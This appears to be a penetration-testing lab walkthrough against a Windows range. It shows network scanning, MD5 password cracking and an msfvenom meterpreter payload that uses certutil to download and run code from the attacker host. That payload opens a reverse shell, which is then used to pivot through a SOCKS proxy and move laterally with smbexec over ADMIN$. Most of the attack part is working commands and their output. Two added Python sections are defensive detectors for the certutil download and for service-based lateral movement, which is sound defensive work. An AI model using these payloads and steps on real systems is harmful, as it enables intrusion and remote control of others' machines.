```
⚡ root@kali ~ nmap -sP 192.168.183.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 05:06 EST
Nmap scan report for 192.168.183.1
Host is up (0.00033s latency).
MAC Address: 00:50:56:C0:00:01 (VMware)
Nmap scan report for 192.168.183.134
Host is up (0.00017s latency).
MAC Address: 00:0C:29:69:C1:18 (VMware)
Nmap scan report for 192.168.183.254
Host is up (0.00017s latency).
MAC Address: 00:50:56:F8:FE:A2 (VMware)
```
The target has HTTP and MySQL services open.
```
⚡ root@kali ~ nmap -sT -min-rate 10000 -p- 192.168.183.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 07:02 EST
Nmap scan report for 192.168.183.134
Host is up (0.00091s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:69:C1:18 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 26.44 seconds
```
```
⚡ root@kali ~ nmap -sT -A -T4 -O -p 80,3306 192.168.183.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 07:03 EST
Nmap scan report for 192.168.183.134
Host is up (0.00053s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.5.38)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:69:C1:18 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 8.1 R1 (96%), Microsoft Windows Phone 7.5 or 8.0 (96%), Microsoft Windows Embedded Standard 7 (96%), Microsoft Windows Server 2008 or 2008 Beta 3 (92%), Microsoft Windows Server 2008 R2 or Windows 8.1 (92%), Microsoft Windows 7 Professional or Windows 8 (92%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (92%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (92%), Microsoft Windows 7 (90%), Microsoft Windows Server 2008 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms 192.168.183.134

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.39 seconds
```
```
⚡ root@kali ~ nmap -script=vuln -p 80,3306 192.168.183.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 07:05 EST
Nmap scan report for 192.168.183.134
Host is up (0.00030s latency).

PORT     STATE SERVICE
80/tcp   open  http
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /robots.txt: Robots file
|   /0/: Potentially interesting folder
|_  /index/: Potentially interesting folder
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
3306/tcp open  mysql
MAC Address: 00:0C:29:69:C1:18 (VMware)
```
```
⚡ root@kali ~ nikto -url 192.168.183.134 -p 80
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.183.134
+ Target Hostname:    192.168.183.134
+ Target Port:        80
+ Start Time:         2025-02-19 07:22:12 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
+ /: Retrieved x-powered-by header: PHP/5.5.38.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.23 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OpenSSL/1.0.2j appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ PHP/5.5.38 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ PHP/5.5 - PHP 3/4/5 and 7.0 are End of Life products without support.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8101 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2025-02-19 07:26:25 (GMT-5) (253 seconds)
---------------------------------------------------------------------------
```
```
⚡ root@kali ~/Desktop/test/ATTCK5 john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 hash
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hashtype, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
admins           (?)
1g 0:00:00:00 DONE (2025-02-19 08:15) 33.33g/s 4467Kp/s 4467Kc/s 4467KC/s applecute..PHOEBE
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
```
This gives the password admins. Open add.php, enter the password, and we are in.

Gaining a foothold

Generate the payload with msfvenom:
```
⚡ root@kali ~/Desktop/test/ATTCK5 msfvenom -p cmd/windows/http/x64/meterpreter/reverse_http lport=4444 lhost=192.168.183.133
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 125 bytes
certutil -urlcache -f http://192.168.183.133:8080/9Bk3xvWa9yQk92crn4JtvA %TEMP%\AVQtnvStA.exe & start /B %TEMP%\AVQtnvStA.exe
⚡ root@kali ~/Desktop/test/ATTCK5
```
Then start the listener in MSF:
```
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload cmd/windows/http/x64/meterpreter/reverse_http
payload => cmd/windows/http/x64/meterpreter/reverse_http
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > set lhost 192.168.183.133
msf6 exploit(multi/handler) > run
[*] Started HTTP reverse handler on http://192.168.183.133:4444
```
Then run the generated payload from the command-execution feature of the webshell on the web server.

The shell calls back and we have a foothold:
```
[*] Started HTTP reverse handler on http://192.168.183.133:4444
[!] http://192.168.183.133:4444 handling request from 192.168.183.134; (UUID: xyuftsit) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.183.133:4444 handling request from 192.168.183.134; (UUID: xyuftsit) Staging x64 payload (204892 bytes) ...
[!] http://192.168.183.133:4444 handling request from 192.168.183.134; (UUID: xyuftsit) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 4 opened (192.168.183.133:4444 -> 192.168.183.134:49411) at 2025-02-19 08:36:17 -0500

meterpreter >
```
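From the defender's side, the chain above leaves a very recognisable process-creation trail: a web server process spawns cmd.exe, which runs certutil -urlcache -f against a remote URL and then launches the download from %TEMP%. The following is an added example, not part of the original writeup; it runs three simple rules over constructed Sysmon Event ID 1-style records (the field names ParentImage, Image and CommandLine are an assumption), with record 0 being the exact payload command line produced by msfvenom above.

```python
import re

# Constructed process-creation records (field names assumed); record 0 is the
# webshell launching the certutil download-and-execute payload from the writeup.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\xampp\apache\bin\httpd.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c certutil -urlcache -f http://192.168.183.133:8080/9Bk3xvWa9yQk92crn4JtvA "
                    r"%TEMP%\AVQtnvStA.exe & start /B %TEMP%\AVQtnvStA.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",           # benign certutil use, no download
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -verify C:\certs\server.cer"},
    {"ParentImage": r"C:\Windows\System32\services.exe",  # ordinary service host
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"svchost.exe -k netsvcs"},
]

WEB_SERVER_PARENTS = ("httpd", "w3wp", "php-cgi", "nginx", "tomcat")
SHELLS = {"cmd.exe", "powershell.exe"}
# certutil with -urlcache, -f and a remote URL: the download pattern used by the payload above.
CERTUTIL_DOWNLOAD = re.compile(r"certutil(?:\.exe)?\s+(?=.*-urlcache)(?=.*\s-f\b)(?=.*https?://)", re.I)
# An .exe launched out of %TEMP% (or any \Temp\ path), optionally via "start /B".
TEMP_EXEC = re.compile(r"(?:start\s+(?:/b\s+)?)?(?:%temp%|\\temp\\)[^\s&|]*\.exe", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(event: dict) -> list[str]:
    """Return the names of the rules this process-creation record matches."""
    hits = []
    cmd = event.get("CommandLine", "")
    if CERTUTIL_DOWNLOAD.search(cmd):
        hits.append("certutil_remote_download")
    if TEMP_EXEC.search(cmd):
        hits.append("exec_from_temp")
    if basename(event["ParentImage"]).startswith(WEB_SERVER_PARENTS) and basename(event["Image"]) in SHELLS:
        hits.append("web_server_spawned_shell")
    return hits


def alerts(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and rule hits for every record that matched at least one rule."""
    return [(i, h) for i, e in enumerate(events) if (h := triage(e))]


if __name__ == "__main__":
    for index, hits in alerts(SAMPLE_EVENTS):
        print(index, hits)
```

Each rule alone is noisy (certutil and %TEMP% have legitimate uses), but all three firing on one record from a web server parent is the signature of exactly this foothold.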
```
meterpreter > bg
[*] Backgrounding session 4...
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set version 5
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
```
Add routes:
```
meterpreter > run post/multi/manage/autoroute

[*] Running module against WIN7
[*] Searching for subnets to autoroute.
[+] Route added to subnet 192.168.138.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.183.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from Bluetooth vc6.
```
```
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.138.138:445  ...  OK
[*] Requesting shares on 192.168.138.138.....
[*] Found writable share ADMIN$
[*] Uploading file KNuZDebw.exe
[*] Opening SVCManager on 192.168.138.138.....
[*] Creating service efVz on 192.168.138.138.....
[*] Starting service efVz.....
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.138.138:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.138.138:445  ...  OK
[!] Press help for extra shell commands
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.138.138:445  ...  OK
[-] Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [版本 6.1.7600]
[-] Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute smbexec.py again with -codec and the corresponding codec
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
```
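The lateral movement above is loud in Windows event logs: a remote host writes a file to ADMIN$, then a service with a random name is installed whose binary sits directly in %SystemRoot%. The following is an added example, not part of the original writeup; it correlates constructed Security 5145 (network share access) and System 7045 (service installed) records whose field names are assumed and whose values mirror the smbexec output above.

```python
import re

# Constructed event records (field names assumed) mirroring the smbexec run above:
# a write to ADMIN$ from the pivot host, then a 7045 for service "efVz".
SAMPLE_EVENTS = [
    {"EventID": 5145, "IpAddress": "192.168.183.134", "ShareName": r"\\*\ADMIN$",
     "RelativeTargetName": "KNuZDebw.exe", "AccessMask": "0x12019f"},   # write to ADMIN$ root
    {"EventID": 5145, "IpAddress": "192.168.138.10", "ShareName": r"\\*\IPC$",
     "RelativeTargetName": "srvsvc", "AccessMask": "0x12019f"},         # ordinary RPC pipe access
    {"EventID": 7045, "ServiceName": "efVz", "ImagePath": r"C:\Windows\KNuZDebw.exe",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Vendor Update Service",
     "ImagePath": r"C:\Program Files\Vendor\upd.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},          # legitimate installer
]

WRITE_BITS = 0x2 | 0x4          # FILE_WRITE_DATA | FILE_APPEND_DATA in the AccessMask
ADMIN_SHARES = {"ADMIN$", "C$"}
# Short mixed-case alphanumeric names like "efVz": weak on its own, so only one of three reasons.
RANDOM_NAME = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])[A-Za-z0-9]{4,12}$")
SYSTEMROOT_ROOT = re.compile(r"^[a-z]:\\windows\\[^\\]+$", re.I)   # file directly under C:\Windows


def admin_share_writes(events: list[dict]) -> dict[str, str]:
    """Map lower-cased file name -> remote IP for each write-capable access to an admin share."""
    uploads = {}
    for e in events:
        if e.get("EventID") != 5145:
            continue
        share = e["ShareName"].rsplit("\\", 1)[-1].upper()
        if share in ADMIN_SHARES and int(e["AccessMask"], 16) & WRITE_BITS:
            uploads[e["RelativeTargetName"].lower()] = e["IpAddress"]
    return uploads


def remote_service_exec_alerts(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Correlate 7045 service installs with prior admin-share uploads and suspicious name/path."""
    uploads = admin_share_writes(events)
    found = []
    for e in events:
        if e.get("EventID") != 7045:
            continue
        path = e["ImagePath"].strip('"')
        binary = path.rsplit("\\", 1)[-1].lower()
        reasons = []
        if binary in uploads:
            reasons.append(f"binary uploaded over admin share from {uploads[binary]}")
        if RANDOM_NAME.match(e["ServiceName"]):
            reasons.append("random-looking service name")
        if SYSTEMROOT_ROOT.match(path):
            reasons.append("binary dropped directly in %SystemRoot% (ADMIN$ root)")
        if reasons:
            found.append((e["ServiceName"], reasons))
    return found
```

The share-write correlation also yields the source address of the pivot host, which is the first thing to block while the service is removed.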